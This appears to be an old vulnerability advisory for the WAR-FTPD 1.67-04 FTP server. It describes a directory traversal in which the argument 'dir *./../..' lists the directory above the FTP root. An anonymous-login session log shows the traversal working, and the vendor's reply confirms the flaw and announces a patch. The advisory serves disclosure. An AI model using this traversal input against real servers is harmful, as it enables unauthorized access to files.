Overview: by adding a special formed argument to the dir command, it is possible to list the /../ directory. Detail: the command is the following: dir *./../.. Log: Verbindung mit 10.17.3.44 wurde hergestellt. 220- Jgaa's Fan Club FTP Service WAR-FTPD 1.67- 04 Ready 220 Please enter your user name. Benutzer (10.17.3.44:(none)): anonymous 331 User name okay. Give your full Email address as password. Kennwort: 230 User logged in, proceed. ftp> dir 200 Port command okay. 150 Opening ASCII NO-PRINT mode data connection for ls -l. total 123 drwxrwxrwx 1 ftp ftp 0 Mar 2 12:17 test -rwxrwxrwx 1 ftp ftp 6 Mar 2 12:33 movedtohomedir.txt -rwxrwxrwx 1 ftp ftp 11 Mar 2 00:29 bisontest.txt drwxrwxrwx 1 ftp ftp 0 Mar 3 15:59 HTTP drwxrwxrwx 1 ftp ftp 0 Mar 3 17:05 huhu drwxrwxrwx 1 ftp ftp 0 Mar 5 13:42 te drwxrwxrwx 1 ftp ftp 0 Mar 5 13:42 ..te 226 Transfer finished successfully. Data connection closed. FTP: 452 Bytes empfangen in 0,02Sekunden 22,60KB/s ftp> cd .. 550 Permission denied. ftp> dir *./../.. 200 Port command okay. 150 Opening ASCII NO-PRINT mode data connection for ls *./../... total 123 -rwxrwxrwx 1 ftp ftp 251658240 Mar 4 18:42 WIN386.SWP drwxrwxrwx 1 ftp ftp 0 Jan 6 20:32 games drwxrwxrwx 1 ftp ftp 0 Jan 7 19:58 HalfLife ....(cut here) ... drwxrwxrwx 1 ftp ftp 0 Jan 15 22:36 delphi_zips drwxrwxrwx 1 ftp ftp 0 Mar 4 15:00 web drwxrwxrwx 1 ftp ftp 0 Mar 4 21:36 WEBS 226 Transfer finished successfully. Data connection closed. FTP: 2977 Bytes empfangen in 0,07Sekunden 42,53KB/s the author has been contacted. response: (slightly edited by se0020) I can confirm that the problem is present in War FTP Daemon 1.67.04. After examining the problem, it _looks_ like the exploit is limited to listing the content one level up from the root-directory. I was unable to access any of the listed files or directories. I do however consider the problem as serious, and wil release a fix within a few hours. the patch has been already released: http://support.jgaa.com